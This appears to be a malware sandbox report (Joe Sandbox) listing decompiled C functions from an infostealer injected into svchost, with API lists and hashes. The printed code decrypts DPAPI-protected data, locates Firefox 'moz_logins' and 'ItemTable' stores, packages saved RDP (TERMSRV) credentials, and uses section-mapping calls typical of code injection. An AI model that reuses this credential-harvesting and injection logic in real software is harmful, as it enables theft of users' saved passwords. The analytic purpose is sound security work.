• Instruction ID: cb3b383ab018b3f0d245f5f7909e22b1c769c83f0945113c6f09f1f9200b7e34
• Opcode Fuzzy Hash: fa73a0ea2442c4d618cb2dfda6befbc841b1e1a34e4a332f4ee8f0cc4bc3fd71
• Instruction Fuzzy Hash: 5AF0F672B301146BAB0426799C59ABF76DDEF847507150139E502D32C1EEB8DE00B5E4
Uniqueness Score: 0.60%

C-Code - Quality: 58%
E0BC01000(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    _Unknown_base(*)()* _t5;

    _t5 = GetProcAddress(LoadLibraryA("Crypt32.dll"), "CryptUnprotectData");
    if(_t5 == 0) {
        return 0;
    } else {
        return  *_t5(_a4, 0, _a8, 0, 0, 1, _a12);
    }
}

APIs
• LoadLibraryA.KERNEL32(Crypt32.dll), ref: 0BC01008
• GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 0BC01014
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Crypt32.dll$CryptUnprotectData
• API String ID: 2574300362-2053659877
• Opcode ID: a89f934995216c444d4820411f80eca2ad9ac105cb8bd08000a77391a29b7d02
• Instruction ID: 6796c0d41acf7e94181e7977280fde3c39864c52eea31f00fb59bbe39387caec
• Opcode Fuzzy Hash: a89f934995216c444d4820411f80eca2ad9ac105cb8bd08000a77391a29b7d02
• Instruction Fuzzy Hash: 25E05BB11B42097FDF085FE0EC0BD6B3B9DEB04F54B048628F90DD4090D9B2D9509630
Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E0BC08D91(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                        				_Unknown_base(*)()* _t5;
                                                                                                                                        
                                                                                                                                        				_t5 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "memmove");
                                                                                                                                        				return  *_t5(_a8, _a4, _a12);
                                                                                                                                        			}

Instruction addresses: 0x0bc08da5, 0x0bc08dba

                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: memmove$ntdll.dll
                                                                                                                                        • API String ID: 1646373207-2310235628
                                                                                                                                        • Opcode ID: 6e43e60b81ff37566e6871c694ce4988b267ec692dfafe285b7c7225b1f9b937
                                                                                                                                        • Instruction ID: 27a45b9473bcf2b9b6d0683cece42ba0f21442f8aaa52553efb1d85970827f55
                                                                                                                                        • Opcode Fuzzy Hash: 6e43e60b81ff37566e6871c694ce4988b267ec692dfafe285b7c7225b1f9b937
                                                                                                                                        • Instruction Fuzzy Hash: EAD0C9324A020DBBCF025FD4FC09D8A3BA9EB44A10B04C920FA1985060CA7692B0DBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC08DBD() {
                                                                                                                                        
                                                                                                                                        				GetProcAddress(GetModuleHandleA("ntdll.dll"), "memcpy");
                                                                                                                                        				goto __eax;
                                                                                                                                        			}

Instruction addresses: 0x0bc08dd1, 0x0bc08dd8

                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,?,0BC021FD,?,?,?), ref: 0BC08DC5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,memcpy), ref: 0BC08DD1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: memcpy$ntdll.dll
                                                                                                                                        • API String ID: 1646373207-2689413831
                                                                                                                                        • Opcode ID: 1bfb154aecdde38005ba7f2fd97415dd44cf967f9badd3b7cf691c59360c0c2e
                                                                                                                                        • Instruction ID: 36c564585b311f60c7c46997600d4a31d12d34ca1a1fbb7ea0b48fea7672d3cd
                                                                                                                                        • Opcode Fuzzy Hash: 1bfb154aecdde38005ba7f2fd97415dd44cf967f9badd3b7cf691c59360c0c2e
                                                                                                                                        • Instruction Fuzzy Hash: 22B092219F4B0DA785002AE9FC0EA963ADCD509D2A7018A60F202C2080CEA1A100CAB6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                        			E0BC06C58(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20) {
                                                                                                                                        				CHAR* _v8;
                                                                                                                                        				char _v12;
                                                                                                                                        				char _v16;
                                                                                                                                        				char _v20;
                                                                                                                                        				void* __esi;
                                                                                                                                        				int _t26;
                                                                                                                                        				void* _t27;
                                                                                                                                        				void* _t28;
                                                                                                                                        				void* _t31;
                                                                                                                                        				intOrPtr _t35;
                                                                                                                                        				signed int _t50;
                                                                                                                                        				signed int _t51;
                                                                                                                                        				void* _t61;
                                                                                                                                        				void* _t62;
                                                                                                                                        				void* _t63;
                                                                                                                                        
                                                                                                                                        				if(_a16 == 5) {
                                                                                                                                        					_t35 = _a12;
                                                                                                                                        					_push(_t35);
                                                                                                                                        					_t50 =  &_v8;
                                                                                                                                        					_t27 = 2;
                                                                                                                                        					_t26 = E0BC0326D(_t27,  &_v12,  &_a16, _t50);
                                                                                                                                        					if(_a16 == 1) {
                                                                                                                                        						_t26 = lstrcmpiA(_v8, "moz_logins");
                                                                                                                                        						if(_t26 == 0) {
                                                                                                                                        							_t26 = E0BC0326D(_t26,  &_v12,  &_a16, _t50, _t35);
                                                                                                                                        							if(_a16 == 1) {
                                                                                                                                        								_t26 = lstrcmpA("table", _v8);
                                                                                                                                        								if(_t26 == 0) {
                                                                                                                                        									_push(_t35);
                                                                                                                                        									_t28 = 3;
                                                                                                                                        									_t26 = E0BC0326D(_t28,  &_v12,  &_a16, _t50);
                                                                                                                                        									if(_a16 == 0) {
                                                                                                                                        										_push(_t35);
                                                                                                                                        										_v20 =  *_v8;
                                                                                                                                        										_t31 = 4;
                                                                                                                                        										_t26 = E0BC0326D(_t31,  &_v12,  &_a16, _t50);
                                                                                                                                        										if(_a16 == 1) {
                                                                                                                                        											_t51 = _t50 | 0xffffffff;
                                                                                                                                        											 *0xbc10d58 = _t51;
                                                                                                                                        											 *0xbc10d20 = _t51;
                                                                                                                                        											 *0xbc10d4c = _t51;
                                                                                                                                        											_t26 = E0BC03786(_v8, E0BC069E3);
                                                                                                                                        											_v16 = 1;
                                                                                                                                        											_t61 =  *0xbc10d58 - _t51; // 0x0
                                                                                                                                        											if(_t61 != 0) {
                                                                                                                                        												_t62 =  *0xbc10d20 - _t51; // 0x0
                                                                                                                                        												if(_t62 != 0) {
                                                                                                                                        													_t63 =  *0xbc10d4c - _t51; // 0x0
                                                                                                                                        													if(_t63 != 0) {
                                                                                                                                        														return E0BC0341E(_a4, _a8, _v20,  &_v16, _a20, E0BC06AA8);
                                                                                                                                        													}
                                                                                                                                        												}
                                                                                                                                        											}
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return _t26;
                                                                                                                                        			}

Instruction addresses: 0x0bc06c65, 0x0bc06c6b, 0x0bc06c6e, 0x0bc06c71, 0x0bc06c7a, 0x0bc06c7b, 0x0bc06c87, 0x0bc06c95, 0x0bc06c9d, 0x0bc06caa, 0x0bc06cb3, 0x0bc06cc1, 0x0bc06cc9, 0x0bc06ccf, 0x0bc06cd8, 0x0bc06cd9, 0x0bc06ce3, 0x0bc06ceb, 0x0bc06cec, 0x0bc06cf4, 0x0bc06cf5, 0x0bc06cfe, 0x0bc06d03, 0x0bc06d0b, 0x0bc06d11, 0x0bc06d17, 0x0bc06d1d, 0x0bc06d23, 0x0bc06d26, 0x0bc06d2c, 0x0bc06d2e, 0x0bc06d34, 0x0bc06d36, 0x0bc06d3c, 0x00000000, 0x0bc06d58, 0x0bc06d3c, 0x0bc06d34, 0x0bc06d2c, 0x0bc06cfe, 0x0bc06ce3, 0x0bc06cc9, 0x0bc06cb3, 0x0bc06c9d, 0x0bc06c87, 0x0bc06d5f

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpiA.KERNEL32(?,moz_logins), ref: 0BC06C95
                                                                                                                                        • lstrcmpA.KERNEL32(table,?), ref: 0BC06CC1
                                                                                                                                          • Part of subcall function 0BC03786: StrStrIA.SHLWAPI(?,0BC0DA88,00000001,?,?,0BC02C1F,0BC02C5D), ref: 0BC03795
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmplstrcmpi
                                                                                                                                        • String ID: moz_logins$table
                                                                                                                                        • API String ID: 3524194181-1174185386
                                                                                                                                        • Opcode ID: 8c45bc7411f9a56c2af4d48fe97ed83161defba4ce25c40f3714c4fd125c6819
                                                                                                                                        • Instruction ID: 2250406e394f9e6393213d053593888077e2cf820bac4244f5dcd1fce543f7f4
                                                                                                                                        • Opcode Fuzzy Hash: 8c45bc7411f9a56c2af4d48fe97ed83161defba4ce25c40f3714c4fd125c6819
                                                                                                                                        • Instruction Fuzzy Hash: A631AE31A3120EEFCF01DF94E891AAD77B8FB44715F10452AF910A6491EB309BA1EF91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.27%

                                                                                                                                        C-Code - Quality: 88%
			// Analyst notes (editorial, derived only from the recovered code below):
			// the routine serialises one record from (_a4, _a8, _a12, _a16): a 4-byte tag
			// 0xbeef0000 (E0BC08A41 with length 4), the strings _a4 and _a8 (E0BC08C6D,
			// which measures them with lstrlenA), then _a16 and, when both are non-zero,
			// _a12. If the target string _a8 contains no '.', it is searched for the
			// "TERMSRV//" prefix (TERMSRV/ is the target-name prefix Windows uses for saved
			// RDP credentials) and handed to E0BC01798; unless that returns -1, a second
			// record tagged 0xbeef0001 is emitted with the returned value in place of _a8.
			E0BC07121(void* __eax, void* __eflags, intOrPtr _a4, char* _a8, char* _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				char* _t30;
				char* _t32;
				char* _t39;     // used below; missing from the decompiler's declarations
				char* _t44;
				void* _t46;
				void* _t47;
				void* _t49;
				void* _t53;
				char* _t58;     // used below; missing from the decompiler's declarations

				_push(_t46);
				_t53 = __eax;
				_v8 = 0xbeef0000;                       // record tag
				E0BC08A41( &_v8, _t46, __eax, 4);       // write the 4-byte tag
				E0BC08C6D(_t53, _t46, _a4);             // write string _a4
				E0BC08C6D(_t53, _t46, _a8);             // write string _a8 (target)
				E0BC08C37(_a16);
				if(_a16 != 0) {
					_t39 = _a12;
					if(_a12 != 0) {
						E0BC08C4D(_t39, _t46, _a16);
					}
				}
				_t30 = StrStrIA(_a8, ".");              // target without a '.'?
				if(_t30 == 0) {
					_t44 = "TERMSRV//";
					_v8 = lstrlenA(_t44);
					_t32 = StrStrIA(_a8, _t44);         // case-insensitive prefix search
					if(_t32 != 0) {
						_a8 = _t32;
					}
					_t30 = E0BC01798(_t32, _a8);
					_t58 = _t30;
					_pop(_t47);
					if(_t30 != 0xffffffff) {            // -1: no second record
						_v8 = 0xbeef0001;               // tag of the second record
						E0BC08A41( &_v8, _t47, _t53, 4);
						E0BC08C6D(_t53, _t47, _a4);
						_pop(_t49);
						E0BC08C37(_t58);                // value from E0BC01798 replaces _a8
						_t30 = E0BC08C37(_a16);
						if(_a16 != 0) {
							_t30 = _a12;
							if(_t30 != 0) {
								_t30 = E0BC08C4D(_t30, _t49, _a16);
							}
						}
					}
				}
				return _t30;
			}

			Instruction addresses (decompiler address gutter, one entry per listing line): 0x0bc07124 to 0x0bc071f9

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC08C6D: lstrlenA.KERNEL32(00000000,00000000,?), ref: 0BC08C7D
                                                                                                                                        • StrStrIA.SHLWAPI(?,0BC0D7EC), ref: 0BC0717E
                                                                                                                                        • lstrlenA.KERNEL32(TERMSRV//), ref: 0BC0718A
                                                                                                                                        • StrStrIA.SHLWAPI(?,TERMSRV//), ref: 0BC07197
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen
                                                                                                                                        • String ID: TERMSRV//
                                                                                                                                        • API String ID: 1659193697-1611467893
                                                                                                                                        • Opcode ID: 76ca7e9d0669b7c3024f392ecb7f0953f2bcccda2ab3229831fcfb63b3612d4c
                                                                                                                                        • Instruction ID: 459ab65ec27502d832a258fa8fdb772e273612651c9682234c844a62929d6ec7
                                                                                                                                        • Opcode Fuzzy Hash: 76ca7e9d0669b7c3024f392ecb7f0953f2bcccda2ab3229831fcfb63b3612d4c
                                                                                                                                        • Instruction Fuzzy Hash: 76216D31632209AFDF05EF68DD42A9D3BB5EF01260F108126FD54A62D0DF31DE60AAA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        C-Code - Quality: 73%
			// Analyst notes (editorial, derived only from the recovered code below):
			// entered only when _a16 == 5, the routine pulls successive tokens from the
			// string at _a12 with E0BC0326D (the first argument appears to select a
			// tokenizer mode; the token type comes back in _a16, the token text in _v8)
			// and proceeds only while the tokens read, in order: a type-1 token equal to
			// "ItemTable" (lstrcmpiW, case-insensitive), a type-1 token equal to "table"
			// (lstrcmpW, case-sensitive), a type-0 token whose first WCHAR is kept in _t33,
			// and one more type-1 token. On a full match the globals at 0xbc10d60 and
			// 0xbc10d40 are cleared and set, and E0BC0341E is invoked with callback E0BC075B0.
			E0BC074DE(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20) {
				WCHAR* _v8;
				char _v12;
				char _v16;
				void* __esi;
				int _t26;
				void* _t27;
				void* _t28;
				void* _t30;
				short _t33;
				WCHAR** _t47;   // used below; missing from the decompiler's declarations

				if(_a16 == 5) {
					_push(_a12);
					_t47 =  &_v8;
					_t27 = 2;
					_t26 = E0BC0326D(_t27,  &_v12,  &_a16,  &_v8);
					if(_a16 == 1) {
						_t26 = lstrcmpiW(_v8, L"ItemTable");         // case-insensitive
						if(_t26 == 0) {
							_t26 = E0BC0326D(_t26,  &_v12,  &_a16,  &_v8, _a12);
							if(_a16 == 1) {
								_t26 = lstrcmpW(L"table", _v8);        // case-sensitive
								if(_t26 == 0) {
									_push(_a12);
									_t28 = 3;
									_t26 = E0BC0326D(_t28,  &_v12,  &_a16,  &_v8);
									if(_a16 == 0) {
										_push(_a12);
										_t33 =  *_v8;                  // first WCHAR of the type-0 token
										_t30 = 4;
										_t26 = E0BC0326D(_t30,  &_v12,  &_a16, _t47);
										if(_a16 == 1) {
											 *0xbc10d60 =  *0xbc10d60 & 0x00000000;
											 *0xbc10d40 = 1;
											_v16 = 1;
											return E0BC0341E(_a4, _a8, _t33,  &_v16, _a20, E0BC075B0);
										}
									}
								}
							}
						}
					}
				}
				return _t26;
			}

			Instruction addresses (decompiler address gutter, one entry per listing line): 0x0bc074eb to 0x0bc075af

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpiW.KERNEL32(?,ItemTable), ref: 0BC0751A
                                                                                                                                        • lstrcmpW.KERNEL32(table,?), ref: 0BC07544
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmplstrcmpi
                                                                                                                                        • String ID: ItemTable$table
                                                                                                                                        • API String ID: 3524194181-1267979783
                                                                                                                                        • Opcode ID: 0e96d1f290e77ff0de0457c760b15f1d92761f9b46ef42ad9515c789933a6d12
                                                                                                                                        • Instruction ID: d961fa73d28766525e424d9c00e5cea6314d9f90037e3bbda9c180b7c6162b74
                                                                                                                                        • Opcode Fuzzy Hash: 0e96d1f290e77ff0de0457c760b15f1d92761f9b46ef42ad9515c789933a6d12
                                                                                                                                        • Instruction Fuzzy Hash: 76215E71A6124EFFCF16DF50E855ADE3B74FF44615F104826F810A6081EB30AB65DB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.34%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:28.5%
                                                                                                                                        Dynamic/Decrypted Code Coverage:5.4%
                                                                                                                                        Signature Coverage:15.6%
                                                                                                                                        Total number of Nodes:186
                                                                                                                                        Total number of Limit Nodes:25

                                                                                                                                        Graph


                                                                                                                                        Executed Functions

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                        			E0040177C(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                        				intOrPtr _v12;
                                                                                                                                        				struct _FILETIME* _v16;
                                                                                                                                        				short _v60;
                                                                                                                                        				struct _FILETIME* _t14;
                                                                                                                                        				intOrPtr _t15;
                                                                                                                                        				long _t18;
                                                                                                                                        				void* _t19;
                                                                                                                                        				void* _t22;
                                                                                                                                        				intOrPtr _t31;
                                                                                                                                        				long _t32;
                                                                                                                                        				void* _t34;
                                                                                                                                        
                                                                                                                                        				_t31 = __edx;
                                                                                                                                        				_t14 =  &_v16;
                                                                                                                                        				GetSystemTimeAsFileTime(_t14);
                                                                                                                                        				_push(0x192);
                                                                                                                                        				_push(0x54d38000);
                                                                                                                                        				_push(_v12);
                                                                                                                                        				_push(_v16);
                                                                                                                                        				L00402214();
                                                                                                                                        				_push(_t14);
                                                                                                                                        				_v16 = _t14;
                                                                                                                                        				_t15 =  *0x404104;
                                                                                                                                        				_push(_t15 + 0x40505e);
                                                                                                                                        				_push(_t15 + 0x405054);
                                                                                                                                        				_push(0x16);
                                                                                                                                        				_push( &_v60);
                                                                                                                                        				_v12 = _t31;
                                                                                                                                        				L0040220E(); // executed
                                                                                                                                        				_t18 = _a4;
                                                                                                                                        				if(_t18 == 0) {
                                                                                                                                        					_t18 = 0x1000;
                                                                                                                                        				}
                                                                                                                                        				_t19 = CreateFileMappingW(0xffffffff, 0x404108, 4, 0, _t18,  &_v60); // executed
                                                                                                                                        				_t34 = _t19;
                                                                                                                                        				if(_t34 == 0) {
                                                                                                                                        					_t32 = GetLastError();
                                                                                                                                        				} else {
                                                                                                                                        					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                        						_t22 = MapViewOfFile(_t34, "true", 0, 0, 0); // executed
                                                                                                                                        						if(_t22 == 0) {
                                                                                                                                        							_t32 = GetLastError();
                                                                                                                                        							if(_t32 != 0) {
                                                                                                                                        								goto L9;
                                                                                                                                        							}
                                                                                                                                        						} else {
                                                                                                                                        							 *_a8 = _t34;
                                                                                                                                        							 *_a12 = _t22;
                                                                                                                                        							_t32 = 0;
                                                                                                                                        						}
                                                                                                                                        					} else {
                                                                                                                                        						_t32 = 2;
                                                                                                                                        						L9:
                                                                                                                                        						CloseHandle(_t34);
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return _t32;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,00401DC7,0000000A,?,?), ref: 00401789
                                                                                                                                        • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0040179F
                                                                                                                                        • _snwprintf.NTDLL ref: 004017C4
                                                                                                                                        • CreateFileMappingW.KERNELBASE(000000FF,00404108,00000004,00000000,?,?), ref: 004017E9
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401DC7,0000000A,?), ref: 00401800
                                                                                                                                        • MapViewOfFile.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 00401814
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401DC7,0000000A,?), ref: 0040182C
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401DC7,0000000A), ref: 00401835
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401DC7,0000000A,?), ref: 0040183D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1724014008-0
                                                                                                                                        • Opcode ID: e7e3afbd12669e58cb121f1928e6193868cf1532ccb2f58477b3601ea12b3819
                                                                                                                                        • Instruction ID: e8a7653da7f220a92f75fec1035567f77f800dad67a15f7c1eb314f57ede4f00
                                                                                                                                        • Opcode Fuzzy Hash: e7e3afbd12669e58cb121f1928e6193868cf1532ccb2f58477b3601ea12b3819
                                                                                                                                        • Instruction Fuzzy Hash: 7A21A4B2600108BFD711BFA8DC88EAF77ACEB44355F108076F605F71E0D6749A418B68
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 6.84%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                        			E004021A7() {
                                                                                                                                        				void* __esi;
                                                                                                                                        				intOrPtr* _t7;
                                                                                                                                        				long _t8;
                                                                                                                                        				long _t11;
                                                                                                                                        				struct _CRITICAL_SECTION* _t12;
                                                                                                                                        
                                                                                                                                        				_t12 = E00401A95(0x28);
                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                        					_t11 = 8;
                                                                                                                                        					L7:
                                                                                                                                        					return _t11;
                                                                                                                                        				}
                                                                                                                                        				_t1 = _t12 + 0x18; // 0x18
                                                                                                                                        				_t7 = _t1;
                                                                                                                                        				 *((intOrPtr*)(_t12 + 0x1c)) = _t7;
                                                                                                                                        				 *_t7 = _t7;
                                                                                                                                        				InitializeCriticalSection(_t12);
                                                                                                                                        				_t8 = TlsAlloc();
                                                                                                                                        				 *(_t12 + 0x24) = _t8;
                                                                                                                                        				if(_t8 == 0xffffffff) {
                                                                                                                                        					L4:
                                                                                                                                        					_t11 = GetLastError();
                                                                                                                                        					if(_t11 != 0) {
                                                                                                                                        						E004019A8(_t12, _t12);
                                                                                                                                        					}
                                                                                                                                        					goto L7;
                                                                                                                                        				}
                                                                                                                                        				__imp__AddVectoredExceptionHandler(1, E00401CB1); // executed
                                                                                                                                        				 *(_t12 + 0x20) = _t8;
                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                        					goto L4;
                                                                                                                                        				}
                                                                                                                                        				 *0x404114 = _t12;
                                                                                                                                        				_t11 = 0;
                                                                                                                                        				goto L7;
                                                                                                                                        			}








Statement addresses (listing order): 0x004021b0 0x004021b4 0x00402207 0x00402208 0x0040220c 0x0040220c 0x004021b6 0x004021b6 0x004021ba 0x004021bd 0x004021bf 0x004021c5 0x004021ce 0x004021d1 0x004021f1 0x004021f7 0x004021fb 0x004021fe 0x004021fe 0x00000000 0x004021fb 0x004021da 0x004021e2 0x004021e5 0x00000000 0x00000000 0x004021e7 0x004021ed 0x00000000

APIs
• Part of subcall function 00401A95: HeapAlloc.KERNEL32(00000000,?,004021B0,00000028,?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 00401AA1
• InitializeCriticalSection.KERNEL32(00000000,00000028,?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 004021BF
• TlsAlloc.KERNEL32(?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 004021C5
• RtlAddVectoredExceptionHandler.NTDLL(00000001,00401CB1,?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 004021DA
• GetLastError.KERNEL32(?,?,00401F0D,?,00000000,?,?,?,0040111D,?,00000000), ref: 004021F1
Memory Dump Source
• Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
Similarity
• API ID: Alloc$CriticalErrorExceptionHandlerHeapInitializeLastSectionVectored
• String ID:
• API String ID: 628750512-0
• Opcode ID: 413a39aa348dd9993e1ffb81996ea63a6f1ff9c789ceaf5c1447ad6097f9e7c8
• Instruction ID: 47aa07a21df1032e2dc94d02296c1eaf06fc460d78e38b2a313ae0c1c180deaf
• Opcode Fuzzy Hash: 413a39aa348dd9993e1ffb81996ea63a6f1ff9c789ceaf5c1447ad6097f9e7c8
• Instruction Fuzzy Hash: 7DF0C8716416009BC3205F799E4DB077AA4BF80B11700033BB515F62E1DBB8C9458BA9
Uniqueness
Uniqueness Score: 2.48%

Control-flow Graph

control_flow_graph 157 401900-401962 NtCreateSection 158 401964-40196d call 401af0 157->158 159 401999-40199d 157->159 161 401972-401976 158->161 165 40199f-4019a5 159->165 163 401991-401997 161->163 164 401978-40198f memset 161->164 163->165 164->165
C-Code - Quality: 72%
E00401900(intOrPtr* __eax, void** _a4) {
	int _v12;
	void* _v16;
	void* _v20;
	void* _v24;
	int _v28;
	int _v32;
	intOrPtr _v36;
	int _v40;
	int _v44;
	void* _v48;
	void* __esi;
	long _t34;
	void* _t39;
	void* _t47;
	intOrPtr* _t48;

	_t48 = __eax;
	asm("stosd");
	asm("stosd");
	asm("stosd");
	asm("stosd");
	asm("stosd");
	asm("stosd");
	_v24 =  *((intOrPtr*)(__eax + 4));
	_v16 = 0;
	_v12 = 0;
	_v48 = 0x18;
	_v44 = 0;
	_v36 = 0x40;
	_v40 = 0;
	_v32 = 0;
	_v28 = 0;
	_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
	if(_t34 < 0) {
		_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
	} else {
		 *_t48 = _v16;
		_t39 = E00401AF0(_t48,  &_v12); // executed
		_t47 = _t39;
		if(_t47 != 0) {
			 *((intOrPtr*)(_t48 + 0x1c))(_v16);
		} else {
			memset(_v12, 0, _v24);
			 *_a4 = _v12;
		}
	}
	return _t47;
}

Statement addresses (listing order): 0x00401909 0x00401910 0x00401911 0x00401912 0x00401913 0x00401914 0x00401925 0x00401929 0x0040193d 0x00401940 0x00401943 0x0040194a 0x0040194d 0x00401954 0x00401957 0x0040195a 0x0040195d 0x00401962 0x0040199d 0x00401964 0x00401967 0x0040196d 0x00401972 0x00401976 0x00401994 0x00401978 0x0040197f 0x0040198d 0x0040198d 0x00401976 0x004019a5

APIs
• NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74F44EE0,00000000,00000000,00000002), ref: 0040195D
• Part of subcall function 00401AF0: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401972,00000002,00000000,?,?,00000000,?,?,00401972,00000000), ref: 00401B1D
• memset.NTDLL ref: 0040197F
Memory Dump Source
• Source File: 0000000D.00000002.703165162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.703181808.0000000000407000.00000040.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_BN6D10.jbxd
Similarity
• API ID: Section$CreateViewmemset
• String ID: @
• API String ID: 2533685722-2766056989
• Opcode ID: 8441c7633daf46c5806a9e1c924941679b689f060eb131cee92b5228861c0d6c
• Instruction ID: 4a8f97b3ffbc75101b963f371c5ead88a4c8780a47697150172b3eb5f380d046
• Opcode Fuzzy Hash: 8441c7633daf46c5806a9e1c924941679b689f060eb131cee92b5228861c0d6c
• Instruction Fuzzy Hash: 45211DB1D00209AFCB11DFA9C8849EEFBB9FF48354F10443AE645F3250D7349A458B64
